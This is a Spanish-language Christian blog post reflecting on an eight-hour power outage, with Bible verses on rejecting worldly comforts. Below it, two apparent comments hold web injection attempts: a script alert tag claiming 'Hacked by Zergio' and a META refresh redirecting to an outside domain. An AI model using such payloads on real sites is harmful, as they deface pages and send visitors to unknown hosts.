Recientemente en el pueblo donde vivo no hubo energía eléctrica por espacio de unas 8 horas. Ese día fue un verdadero calvario para mí y toda mi familia ya que fueron horas de calor, sed, angustia, mal momento etc.
Estando ya acostado en mi cama y repasando mentalmente lo que fue el día, llego a mí un pensamiento que me decía que Jesús había pasado esas calamidades y mucho más, de hecho “no tenía ni donde recostar su cabeza” Mt 8,18-22
Apenas tuve 8 horas sin luz y parecía una eternidad, el mundo de alguna manera nos moldea, cosa que debe ser todo lo contrario, el cristiano debe moldear el mundo con el amor, la paciencia y la entrega. Jesús nos enseño que no tenemos que valorar las cosas de este mundo como un todo, nos ofrece placer, comodidad, diversión, tranquilidad, y tecnología, en lugar de ayudarnos a estar más cerca de Dios, nos aleja más de Él.
No debemos “vivir según los criterios de este mundo” cuando este nos propone ser materialista, consumista, poderoso y en donde el placer sexual se ha convertido en el pan de cada día e incluso en un gran porcentaje de la publicidad y de los mensajes que proporcionan los medios de comunicación.
Ser amigo del mundo cuando nos ofrece estas cosas es ser “enemigo de Dios” St 4,4
La conclusión de este día para mí es que hay que vivir como Jesús vivió, por ello hay que:
v “Ser servidor de los demás” Mt 20,27
v “Considerarse muerto al pecado y vivo para Dios” Rm 6,11
v “No tener pensamientos inútiles y razón oscurecida “Ef 4,17-18
v “Dejarse conducir por el Espíritu de Dios para no ser arrastrados por los bajos deseos” Gal 5,17
v “Ser luz para este mundo” Mt 5,14
< script>alert('Hacked by Zergio');< script>
ResponderEliminarMETA HTTP-EQUIV="Refresh" CONTENT="3; URL=coquimail.tk">
ResponderEliminar